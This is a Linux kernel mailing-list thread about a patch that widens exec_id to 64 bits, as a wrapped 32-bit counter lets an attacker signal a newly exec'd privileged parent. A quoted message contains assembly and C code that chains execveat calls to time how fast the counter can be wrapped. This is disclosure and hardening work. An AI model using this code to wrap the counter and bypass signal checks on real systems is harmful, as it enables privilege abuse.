On Thu, Apr 02, 2020 at 06:46:49AM +0200, Jann Horn wrote:
On Wed, Apr 1, 2020 at 10:50 PM Eric W. Biederman ebiederm@xmission.com wrote:
Replace the 32bit exec_id with a 64bit exec_id to make it impossible to wrap the exec_id counter. With care an attacker can cause exec_id wrap and send arbitrary signals to a newly exec'd parent. This bypasses the signal sending checks if the parent changes their credentials during exec.
The severity of this problem can been seen that in my limited testing of a 32bit exec_id it can take as little as 19s to exec 65536 times. Which means that it can take as little as 14 days to wrap a 32bit exec_id. Adam Zabrocki has succeeded wrapping the self_exe_id in 7 days. Even my slower timing is in the uptime of a typical server.
FYI, if you actually optimize this, it's more like 12s to exec 1048576 times according to my test, which means ~14 hours for 2^32 executions (on a single core). That's on an i7-4790 (a Haswell desktop processor that was launched about six years ago, in 2014).
Yep, there are a few ways of optimizing it and I believe I've pointed it out here: https://www.openwall.com/lists/kernel-hardening/2020/03/31/11
Thanks for doing such tests :)
I've also modified your PoC to use 'sysenter' and 'syscall' instruction. Both cases gave me an extra 4% speed bump (including a test for 64-bits "fast_execve"). I've run it under Intel(R) Xeon(R) E-2176G CPU @ 3.70GHz
As you've proven, it is possible to be done in a matter of hours.
Thanks, Adam
Here's my test code:
============= $ grep 'model name' /proc/cpuinfo | head -n1 model name : Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz $ cat build.sh #!/bin/sh set -e nasm -felf32 -o fast_execve.o fast_execve.asm ld -m elf_i386 -o fast_execve fast_execve.o gcc -o launch launch.c -Wall gcc -o finish finish.c -Wall $ cat fast_execve.asm bits 32
section .text global _start _start: ; eax = argv[0] ; expected to be 8 hex digits, with 'a' meaning 0x0 and 'p' meaning 0xf mov eax, [esp+4]
mov ebx, 0 ; loop counter hex_digit_loop: inc byte [eax+ebx] cmp byte [eax+ebx], 'a'+16 jne next_exec mov byte [eax+ebx], 'a' inc ebx cmp ebx, 5 ;;;;;;;;;;;;;;;;;; this is N, where iteration_count=pow(16,N) jne hex_digit_loop
; reached pow(256,N) execs, get out
; first make the stack big again mov eax, 75 ; setrlimit (32-bit ABI) mov ebx, 3 ; RLIMIT_STACK mov ecx, stacklim int 0x80
; execute end helper mov ebx, 4 ; dirfd = 4 jmp common_exec
next_exec: mov ebx, 3 ; dirfd = 3
common_exec: ; execveat() with file descriptor passed in as ebx mov ecx, nullval ; pathname = empty string lea edx, [esp+4] ; argv mov esi, 0 ; envp mov edi, 0x1000 ; flags = AT_EMPTY_PATH mov eax, 358 ; execveat (32-bit ABI) int 0x80 int3
nullval: dd 0 stacklim: dd 0x02000000 dd 0xffffffff $ cat launch.c #define _GNU_SOURCE #include <fcntl.h> #include <err.h> #include <unistd.h> #include <sys/syscall.h> #include <sys/resource.h> int main(void) { close(3); close(4); if (open("fast_execve", O_PATH) != 3) err(1, "open fast_execve"); if (open("finish", O_PATH) != 4) err(1, "open finish"); char *argv[] = { "aaaaaaaa", NULL };
struct rlimit lim; if (getrlimit(RLIMIT_STACK, &lim)) err(1, "getrlimit"); lim.rlim_cur = 0x4000; if (setrlimit(RLIMIT_STACK, &lim)) err(1, "setrlimit");
syscall(__NR_execveat, 3, "", argv, NULL, AT_EMPTY_PATH); } $ cat finish.c #include <stdlib.h> int main(void) { exit(0); } $ ./build.sh $ time ./launch
real 0m12,075s user 0m0,905s sys 0m11,026s $ =============